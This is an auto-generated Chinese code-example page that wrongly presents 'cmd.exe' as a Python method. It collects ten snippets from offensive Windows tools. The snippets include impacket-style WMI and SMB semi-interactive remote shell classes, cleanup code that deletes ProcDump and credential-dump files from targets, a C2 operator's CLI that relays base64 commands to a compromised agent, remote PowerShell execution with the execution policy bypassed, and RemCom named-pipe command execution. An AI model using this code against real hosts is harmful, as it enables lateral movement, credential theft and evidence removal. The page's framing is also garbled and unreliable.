本文整理汇总了Python中cmd.exe方法的典型用法代码示例。如果您正苦于以下问题:Python cmd.exe方法的具体用法?Python cmd.exe怎么用?Python cmd.exe使用的例子?那么, 这里精选的方法代码示例或许可以为您提供帮助。您也可以进一步了解该方法所在类cmd
的用法示例。
在下文中一共展示了cmd.exe方法的10个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。
示例1: __init__
# 需要导入模块: import cmd [as 别名]
# 或者: from cmd import exe [as 别名]
def __init__(self, share, win32Process, smbConnection):
cmd.Cmd.__init__(self)
self.__share = share
self.__output = '\\' + OUTPUT_FILENAME
self.__outputBuffer = str('')
self.__shell = 'cmd.exe /Q /c '
self.__win32Process = win32Process
self.__transferClient = smbConnection
self.__pwd = str('C:\\')
self.__noOutput = False
self.intro = '[!] Launching semi-interactive shell - Careful what you execute\n[!] Press help for extra shell commands'
# We don't wanna deal with timeouts from now on.
if self.__transferClient is not None:
self.__transferClient.setTimeout(1000000)
self.do_cd('\\')
else:
self.__noOutput = True
示例2: __init__
# 需要导入模块: import cmd [as 别名]
# 或者: from cmd import exe [as 别名]
def __init__(self, share, win32Process, smbConnection):
cmd.Cmd.__init__(self)
self.__share = share
self.__output = '\\' + OUTPUT_FILENAME
self.__outputBuffer = ''
self.__shell = 'cmd.exe /Q /c '
self.__win32Process = win32Process
self.__transferClient = smbConnection
self.__pwd = 'C:\\'
self.__noOutput = False
self.intro = '[!] Launching semi-interactive shell - Careful what you execute'
# We don't wanna deal with timeouts from now on.
if self.__transferClient is not None:
self.__transferClient.setTimeout(100000)
self.do_cd('\\')
else:
self.__noOutput = True
示例3: __init__
# 需要导入模块: import cmd [as 别名]
# 或者: from cmd import exe [as 别名]
def __init__(self, share, win32Process, smbConnection, disp_output=True):
cmd.Cmd.__init__(self)
self.__share = share
self.__output = '\\' + OUTPUT_FILENAME
self.__outputBuffer = ''
self.__shell = 'cmd.exe /Q /c '
self.__win32Process = win32Process
self.__transferClient = smbConnection
self.__pwd = 'C:\\'
self.__noOutput = False
self.__disp_output = disp_output
self.intro = '[!] Launching semi-interactive shell - Careful what you execute\n[!] Press help for extra shell commands'
# We don't wanna deal with timeouts from now on.
if self.__transferClient is not None:
self.__transferClient.setTimeout(100000)
self.do_cd('\\')
else:
self.__noOutput = True
示例4: __init__
# 需要导入模块: import cmd [as 别名]
# 或者: from cmd import exe [as 别名]
def __init__(self, share, win32Process, smbConnection):
cmd.Cmd.__init__(self)
self.__share = share
self.__output = '\\' + OUTPUT_FILENAME
self.__outputBuffer = str('')
self.__shell = 'cmd.exe /Q /c '
self.__win32Process = win32Process
self.__transferClient = smbConnection
self.__pwd = str('C:\\')
self.__noOutput = False
self.intro = '[!] Launching semi-interactive shell - Careful what you execute\n[!] Press help for extra shell commands'
# We don't wanna deal with timeouts from now on.
if self.__transferClient is not None:
self.__transferClient.setTimeout(100000)
self.do_cd('\\')
else:
self.__noOutput = True
示例5: __init__
# 需要导入模块: import cmd [as 别名]
# 或者: from cmd import exe [as 别名]
def __init__(self, share, win32Process, smbConnection):
cmd.Cmd.__init__(self)
self.__share = share
self.__output = '\\Windows\\Temp\\' + OUTPUT_FILENAME
self.__outputBuffer = ''
self.__shell = 'cmd.exe /Q /c '
self.__win32Process = win32Process
self.__transferClient = smbConnection
self.__pwd = 'C:\\'
self.__noOutput = False
self.intro = '[!] Launching semi-interactive shell - Careful what you execute\n[!] Press help for extra shell commands'
# We don't wanna deal with timeouts from now on.
if self.__transferClient is not None:
self.__transferClient.setTimeout(10000)
self.do_cd('\\')
else:
self.__noOutput = True
示例6: __init__
# 需要导入模块: import cmd [as 别名]
# 或者: from cmd import exe [as 别名]
def __init__(self, share, win32Process, smbConnection):
cmd.Cmd.__init__(self)
self.__share = share
self.__output = '\\' + OUTPUT_FILENAME
self.__outputBuffer = unicode('')
self.__shell = 'cmd.exe /Q /c '
self.__win32Process = win32Process
self.__transferClient = smbConnection
self.__pwd = unicode('C:\\')
self.__noOutput = False
self.intro = '[!] Launching semi-interactive shell - Careful what you execute\n[!] Press help for extra shell commands'
# We don't wanna deal with timeouts from now on.
if self.__transferClient is not None:
self.__transferClient.setTimeout(100000)
self.do_cd('\\')
else:
self.__noOutput = True
示例7: run
# 需要导入模块: import cmd [as 别名]
# 或者: from cmd import exe [as 别名]
def run(self, addr, osArch='64'):
dcom = DCOMConnection(addr, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey, oxidResolver=True, doKerberos=self.__doKerberos, kdcHost=self.__kdcHost)
try:
iInterface = dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,wmi.IID_IWbemLevel1Login)
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
iWbemServices=iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
iWbemLevel1Login.RemRelease()
win32Process,_ = iWbemServices.GetObject('Win32_Process')
self.shell = RemoteShell(self.__share, win32Process, self.__smbConnection)
# Delete Procdump
cmd = "del procdump%s.exe" % (osArch)
logging.info("%s Deleting ProcDump on %s..." % (debugBlue, addr))
if logging.getLogger().getEffectiveLevel() > 10:
with suppress_std():
self.shell.onecmd(cmd)
else:
self.shell.onecmd(cmd)
# Delete Dumps
cmd = "del SPRAY_*.dmp"
logging.info("%s Deleting dumps on %s..." % (debugBlue, addr))
if logging.getLogger().getEffectiveLevel() > 10:
with suppress_std():
self.shell.onecmd(cmd)
else:
self.shell.onecmd(cmd)
finally:
if self.__smbConnection is not None:
self.__smbConnection.logoff()
dcom.disconnect()
sys.stdout.flush()
示例8: do_cli
# 需要导入模块: import cmd [as 别名]
# 或者: from cmd import exe [as 别名]
def do_cli(self, args):
"""Switches to the CLI command mode to task current agent with some CLI commands (cmd.exe)"""
if not self.currentAgentID:
print(helpers.color("[!] No agent selected.\nUse the 'list' command to get the list of available agents, then 'use' to select one"))
return
print helpers.color("[*] Switching to CLI mode")
print helpers.color("[*] Use the command 'back' to exit CLI mode")
while True:
cli = raw_input("[{}-cli]#> ".format(self.currentAgentID))
if cli:
if cli == 'back':
return
else:
request = helpers.b64encode('cli')+'|'+helpers.b64encode(cli)
# Send message to the main thread for dispatching
self.c2mQueue.put({'type': 'request', 'value': request})
# Wait for main thread's answer, block until we get an answer
response = self.m2cQueue.get()
if response['type'] == 'response':
print helpers.b64decode(response['value'])
elif response['type'] == 'disconnected':
self.prompt = "[no agent]#> "
self.currentAgentID = None
return
#------------------------------------------------------------------------------------
示例9: start_file_search
# 需要导入模块: import cmd [as 别名]
# 或者: from cmd import exe [as 别名]
def start_file_search(self, host, pattern, share, search_path):
try:
myIPaddr = self.get_ip_address()
job_name = uuid.uuid4().hex
tmp_dir = self.exec_command(host, share, 'echo %TEMP%', disp_output=False).strip()
if len(tmp_dir) == 0:
tmp_dir = 'C:\\Windows\\Temp'
tmp_bat_cmd = 'powershell -NoLogo -ExecutionPolicy bypass -Command " & {}Get-ChildItem {}\*.* -Recurse -Exclude *.dll,*.exe,*.msi,*.jpg,*.gif,*.bmp,*.png,*.mp3,*.wav | Select-String -Pattern \'{}\' | Select-Object -Unique Path | out-string -width 220{}" 2>nul > {}\{}.txt'.format('{', search_path, pattern, '}', tmp_dir, job_name)
tmp_bat = open('./{}/{}.bat'.format(PSUTIL_DIR, job_name), 'w')
tmp_bat.write(tmp_bat_cmd)
tmp_bat.close()
ps_command = 'powershell -ExecutionPolicy bypass -NoLogo -command "Start-Process """cmd.exe""" """/c \\\\{}\\{}\\{}.bat""" "'.format(myIPaddr, PSUTIL_SHARE, job_name)
success = self.exec_command(host, share, ps_command, disp_output=False)
print('[+] Job {} started on {}, result will be stored at {}\{}.txt'.format(job_name, host, tmp_dir, job_name))
proc_id = self.get_job_procid(host, share, tmp_dir, job_name)
if len(proc_id) > 0:
proc_id = [j.strip() for j in proc_id.split('\n') if len(j) > 0]
self.jobs[job_name] = { 'host' : host, 'share' : share, 'tmp' : tmp_dir , 'pattern' : pattern, 'start_time': time.perf_counter() , 'proc_id' : proc_id }
except Exception as e:
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
#print('[!] Something weird happened: {} on line {}'.format(e, exc_tb.tb_lineno))
sys.stdout.flush()
print('[!] Job creation failed on host: %s. Did you run as r00t?' % (host))
示例10: execute
# 需要导入模块: import cmd [as 别名]
# 或者: from cmd import exe [as 别名]
def execute(self, command, useDrive=False):
try:
assert (self.__service is not None)
# Connect to the IPC tree and open RemComSvc exchange pipe
tid = self.__smbconnection.connectTree('IPC$')
fid = self.__openNamedPipe(tid, '\RemCom_communicaton', 0x12019f)
# Build packet
packet = RemComMessage()
pid = os.getpid()
c = 'ABCDEFGHIJKLMNOPRSTUVWXYZabcdefghijklmnoprsqtuvwxyz';
command = 'cmd.exe /C '+command
packet['Machine'] = ''.join([random.choice(c) for i in range(4)])
packet['WorkingDir'] = '%s:\\' % self.drive if useDrive else '\\'
packet['Priority'] = PRIORITY_NORMAL
packet['Command'] = command.encode('utf-8')
packet['ProcessID'] = pid
# Send it along with the command
self.__log__(logging.DEBUG, 'Executing command: "'+command+'" with priority '+str(PRIORITY_NORMAL))
self.__smbconnection.writeNamedPipe(tid, fid, str(packet))
# Opens the STD pipes
cred = self.__smbconnection.getCredentials()
host = self.__smbconnection.getRemoteHost()
port = 445
stdin_pipe = pipes.RemoteStdInPipe(host, port, cred,'\%s%s%d' % ('RemCom_stdin' ,packet['Machine'],packet['ProcessID']), FILE_WRITE_DATA | FILE_APPEND_DATA, self.__writableShare )
stdin_pipe.start()
stdout_pipe = pipes.RemoteStdOutPipe(host, port, cred,'\%s%s%d' % ('RemCom_stdout',packet['Machine'],packet['ProcessID']), FILE_READ_DATA )
stdout_pipe.start()
stderr_pipe = pipes.RemoteStdErrPipe(host, port, cred,'\%s%s%d' % ('RemCom_stderr',packet['Machine'],packet['ProcessID']), FILE_READ_DATA )
stderr_pipe.start()
# Should be hanging till the command is completed
ans = self.__smbconnection.readNamedPipe(tid,fid,8)
# get stdout
ret = stdout_pipe.out
# Close the pipes
stdin_pipe.stop()
stdout_pipe.stop()
stderr_pipe.stop()
# Yeah, it can happen, dunno why.
if ret[:2] == '\x0d\x0a':
ret = ret[2:]
# Most commands return an additional line. See if keeping it is useful
return ret[:-2]
except Exception, e:
self.__log__(logging.ERROR, 'Error during command execution', e)
# File operations